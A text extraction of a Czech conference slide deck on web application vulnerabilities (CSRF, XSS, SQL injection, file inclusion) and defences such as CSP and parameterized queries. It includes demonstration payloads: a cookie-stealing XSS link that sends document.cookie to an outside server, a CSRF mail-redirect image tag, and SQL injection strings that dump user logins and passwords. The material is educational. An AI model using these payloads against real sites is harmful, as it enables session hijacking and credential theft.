Zranitelnosti webových aplikací. Vlastimil Pečínka, Seznam.cz Roman Kümmel, Soom.cz

Rozměr: px

Začít zobrazení ze stránky:

Download "Zranitelnosti webových aplikací. Vlastimil Pečínka, Seznam.cz Roman Kümmel, Soom.cz"

Blanka Dušková
před 8 lety
Počet zobrazení:

1 Zranitelnosti webových aplikací Vlastimil Pečínka, Seznam.cz Roman Kümmel, Soom.cz

2 Terminologie Zranitelnost (vulnerability) Slabina, která umožní utočníkovi snížit/obejít ochranu dat a informací Security bug je užší vnímání zranitelnosti; existují non-sw zranitelnosti (HW, zaměstnanci, ) Exploit V informatice program nebo sekvence příkazů, které využívají zranitelnosti a umožňují tak získat nějaký prospěch

existují non-sw zranitelnosti (HW, zaměstnanci, ) Exploit V informatice program

3 Webové zranitelnosti XSS Cross-site scripting Využití důvěry uživatele v server CSRF Cross-site request forgery Využití důvěry serveru v software uživatele

4 Webové zranitelnosti HTTP header injection Využití vlastností HTTP protokolu v kombinaci s neošetřeným předávaným vstupem od uživatele v hlavičkách SQL injection Využití mezery v zabezpečení na úrovni databázové vrstvy aplikace

předávaným vstupem od uživatele v hlavičkách SQL

5 Svět webových zranitelností Proměnná CSS Flash CRLF RFI LFI SQLi FPD SQL injection CSRF XSS HTTP injection Same origin policy IE XSS filter NOSCRIPT Persistent Non- Persistent DOM based HTTP only cookies Content security policy

origin policy IE XSS filter NOSCRIPT Persistent Non-

6 Praktická ukázka Roman Kümmel

7 Praktická ukázka Zranitelná webová aplikace

8 Cross Site Request Forgery (CSRF) Každá změna v datech uložených na serveru je jen reakcí na požadavek vyslaný browserem Každý uživatel je na serveru identifikován Každý uživatel může provádět změny pouze ve svém vlastním účtu

je na serveru identifikován Každý uživatel může provádět změny pouze

9 Cross Site Request Forgery (CSRF) Nikdo střízlivý nedá vědomě serveru povel na přesměrování pošty na účet útočníka Cílem útočníka je přimět uživatele k jeho odeslání

účet útočníka Cílem útočníka je přimět uživatele k

10 Útok (CSRF) Nazdar Pepo, nechceš zítra zajít na pivo? Lojza <img src= >

Lojza <img src= http://webmail.cz/remail.

11 Útok (CSRF) X

12 Obrana (CSRF) Každá změna v datech uložených na serveru je jen reakcí na požadavek vyslaný browserem Každý uživatel je na serveru identifikován Každý uživatel může provádět změny pouze ve svém vlastním účtu hash=a5dd78e r .php?mail=user@seznam.cz&hash=a5dd78e

serveru identifikován Každý uživatel může provádět změny pouze ve

13 CSRF : XSS Zjištění hodnoty lístku pomocí XSS

14 Cross Site Scripting (XSS) Skripty mohou přistupovat pouze k objektům ze stejné domény ( Same Origin Policy ) Pokud existuje chyba v zabezpečení, je možné injektovat skript do html dokumentu z dané domény Perzistentní (trvalé) Non-perzistentní (reflektované)

chyba v zabezpečení, je možné injektovat skript do html

15 Non-perzistetní XSS Odeslání požadavku webovým vyhledávačem Odpověď vrácená prohlížečem Na váš dotaz slunce nebyl nalezen žádný výsledek

16 Non-perzistetní XSS Odeslání požadavku webovým vyhledávačem Zobrazení odpovědi vede ke spuštění skriptu Na váš dotaz <script>alert(1)</script> nebyl nazezen žádný výsledek

query=<script>alert(1)</script> Zobrazení odpovědi vede

17 Možné cíle útoku (XSS) Krádež cookies Přesměrování uživatelů na jiné webové stránky Defacement webové stránky Automatické odesílání CSRF požadavků Změna atributu action u přihlašovacích formulářů Odposlouchávání stisknutých kláves Průzkum vnitřní sítě Backdoor s obousměrnou komunikací Mnoho dalších variant útoku

atributu action u přihlašovacích formulářů Odposlouchávání stisknutých kláves

18 Cookie stealing (XSS) Nazdar Pepo, nechceš zítra zajít na pivo? Lojza <a href= document.createelement%28%22img%22%29%3b+i.src%3d%22 http%3a%2f%2fmyserver.cz%3fsavecook%3d%22%252b document.cookie%3b%3c%2fscript%3e >Super odkaz</a> <script> i=document.createelement("img"); i.src= </script>

src%3d%22 http%3a%2f%2fmyserver.cz%3fsavecook%3d%22%252b document.

19 Cookie stealing (XSS)

20 Obrana (XSS) Nahrazení nebezpečných znaků HTML entitami < &lg; > > " ' & & Nebezpečnost znaků záleží na kontextu v jakém jsou použity - <p>toto je tvůj vstup: <script>alert(1)</script></p> - <input type= text value= onfocus= alert(1) > Pozor na Javascript: a Data: URL v odkazech - <a href= javascript:alert(1) >odkaz</a>

vstup: <script>alert(1)</script></p> - <input type= text value= onfocus= alert(1)

21 Obrana (XSS) Uživatelský vstup kontrolovat podle bílých seznamů Co není povoleno, je zakázáno!

22 SQL injection Zmanipulování dotazu do databáze SELECT jablka FROM strom SELECT hrušky FROM obchod

23 SQL injection pepa pass123 PHP $sql = "SELECT * FROM users WHERE (login = '$login') and (heslo = '$heslo')"; $res = mysql_query($sql); SQL SELECT * FROM users WHERE (login = 'pepa') and (heslo = 'pass123')

24 Útok SQL injection ' OR '1' = '1 pepa PHP $sql = "SELECT * FROM users WHERE (login = '$login') and (heslo = '$heslo')"; $res = mysql_query($sql); SQL SELECT * FROM users WHERE (login = 'pepa') and (heslo = '' OR '1' = '1')

25 SQL injection PHP $sql = "SELECT * FROM messages WHERE idprijemce = $iduser"; $res = mysql_query($sql); SQL SELECT * FROM messages WHERE idprijemce = 11614

26 Útok SQL injection PHP $sql = "SELECT * FROM messages WHERE idprijemce = $iduser"; $res = mysql_query($sql); SQL SELECT * FROM messages WHERE idprijemce = -1 or 1=1

27 Útok SQL injection Zjištění počtu sloupců tabulky v původním dotazu Zjištění zobrazených polí iduser=-1 union all select 1,2,3,4 Zjištění názvu databáze iduser=-1 union all select 1,2,3,database() SELECT * FROM messages WHERE idprijemce = -1 order by 1 -- Zjištění názvů tabulek a sloupců iduser=-1 union all select 1,2,table_name,column_name from information_schema.columns where table_schema=database() Výpis obsahu tabulky USERS iduser=-1 union all select 1,nick,login,heslo from users--

28 Obrana proti SQL injection Kontrola vstupu Odstranění, zdvojení nebo escapování apostrofů Číselné hodnoty ošetřit typovou konverzí Výčtové vstupy kontrolovat na očekávané hodnoty Využití parametrizovaných SQL dotazů Využití uložených procedur

29 Injektáž skriptu na server Nezabezpečený upload Local File Inclusion (LFI) Remote File Inclusion (RFI)

30 (ne) bezpečný Internet

31 Pomocníci v zabezpečení Content Security Policy Same origin policy XSS filter v IE HTTPonly cookies

32 Content security policy Pravidla zaměřená na potlačení především XSS CSP umožňuje poskytovatelům definovat pravidla, kterými se prohlížeč řídí Pravidla se pro dokument v HTTP hlavičkách Možnost reportingu při porušení pravidel Browser bonzuje pomocí JSON, co se stalo Report-only mode (what-if scénáře) X-Content-Security-Policy: allow 'self'; img-src *; \ object-src media1.com media2.com *.cdn.com; \ script-src trustedscripts.example.com

33 Same origin policy Koncept známý od doby Netscape Navigator 2.0 Pravidla povolují plný přístupu skriptů k funkcím a proměnným ve stránkách ze stejných zdrojů (a naopak limitují přístup k datům jiných zdrojů) Jiný hostname (i vs seznam.cz) Jiný port ( vs Jiný protokol ( vs Nejasně definované pro file:, data:, Jiné policy např. pro skripty z jiných domén

34 IE XSS filter Vlastnost IE8, která ztěžuje tzv. reflected XSS Filtr je komponenta, která je zapojena do všech požadavků, které tečou skrze prohlížeč Snaží se detekovat XSS a případně neutralizovat

35 HTTPonly cookie Stále ve stádiu draftu IETF, nicméně široce podporované v prohlížečích Cookie, které není přístupná skriptům na stránce, jen použita pro HTTP/HTTPS session Často použita v kombinaci s omezením přenášení po zabezpečeném spojení Set-Cookie: SSID=Adsd4ddssTq; Domain=.seznam.cz; Path=/; Expires=Wed, 13-Jan :23:01 GMT; Secure; HttpOnly

36 Děkujeme za pozornost Vlastimil Pečínka Roman Kümmel

Podobné dokumenty

Testování webových aplikací Seznam.cz

Testování webových aplikací Seznam.cz Roman Kümmel Bezpečnostní hrozby Síťové prvky, servery VPN, Remote desktop Webové aplikace DoS, DDoS Sociotechnika Wi-Fi Útoky proti uživatelům Útoky proti aplikaci